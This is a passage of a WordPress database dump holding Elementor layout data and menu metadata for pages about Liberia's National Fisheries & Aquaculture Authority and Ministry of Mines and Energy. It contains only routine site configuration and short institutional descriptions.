\",\"_border_hover_border\":\"\",\"_border_hover_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_color\":\"\",\"_border_radius_hover\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_hover_box_shadow_type\":\"\",\"_box_shadow_hover_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_hover_box_shadow_position\":\" \",\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_width\":\"\",\"_element_width_tablet\":\"\",\"_element_width_mobile\":\"\",\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_vertical_align\":\"\",\"_element_vertical_align_tablet\":\"\",\"_element_vertical_align_mobile\":\"\",\"_position\":\"\",\"_offset_orientation_h\":\"start\",\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_orientation_v\":\"start\",\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(14222,2269,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(14223,2270,'_elementor_edit_mode','builder'),(14224,2270,'_elementor_template_type','wp-post'),(14225,2270,'_elementor_version','2.7.5'),(14226,2270,'_wp_page_template','default'),(14227,2270,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\\n\\nThe overall fisheries sector goal is: Sustainably managed and economically viable\\nfisheries that generate prosperity for the present and generations yet unborn.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c9fcce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2e54ec5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d6bc921\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"70ac5b1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0e5b35e\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:nafaa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(14230,2271,'_elementor_edit_mode','builder'),(14231,2271,'_elementor_template_type','wp-post'),(14232,2271,'_elementor_version','2.7.5'),(14233,2271,'_wp_page_template','default'),(14234,2271,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.<\\/p>\\n<p>The overall fisheries sector goal is: Sustainably managed and economically viable fisheries that generate prosperity for the present and generations yet unborn.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c9fcce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2e54ec5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d6bc921\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"70ac5b1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0e5b35e\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:nafaa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(14238,2272,'_elementor_edit_mode','builder'),(14239,2272,'_elementor_template_type','wp-post'),(14240,2272,'_elementor_version','2.7.5'),(14241,2272,'_wp_page_template','default'),(14242,2272,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.<\\/p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 \\u2013 2015) program that was signed in 2010.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f9bdf80\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ef5e727\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b1fc198\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"73c163b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e600ccf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(14245,2273,'_elementor_edit_mode','builder'),(14246,2273,'_elementor_template_type','wp-post'),(14247,2273,'_elementor_version','2.7.5'),(14248,2273,'_wp_page_template','default'),(14249,2273,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.<\\/p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 \\u2013 2015) program that was signed in 2010.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c6396f9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(14254,2274,'_menu_item_type','custom'),(14255,2274,'_menu_item_menu_item_parent','0'),(14256,2274,'_menu_item_object_id','2274'),(14257,2274,'_menu_item_object','custom'),(14258,2274,'_menu_item_target','_blank'),(14259,2274,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(14260,2274,'_menu_item_xfn',''),(14261,2274,'_menu_item_url','https://mme.gov.lr/'),(14263,2274,'_menu_item_template',''),(14264,2274,'_menu_item_mega_template','0'),(14265,2274,'_menu_item_nolink',''),(14266,2274,'_menu_item_category_post',''),(14267,2274,'_menu_item_megamenu',''),(14268,2274,'_menu_item_megamenu_auto_width',''),(14269,2274,'_menu_item_megamenu_col',''),(14270,2274,'_menu_item_megamenu_heading',''),(14271,2274,'_menu_item_megamenu_widgetarea','0'),(14272,2274,'_menu_item_icon',''),(14273,2275,'_menu_item_type','custom'),(14274,2275,'_menu_item_menu_item_parent','0'),(14275,2275,'_menu_item_object_id','2275'),(14276,2275,'_menu_item_object','custom'),(14277,2275,'_menu_item_target','_blank'),(14278,2275,'_menu_item_classes','a:1:{i:0;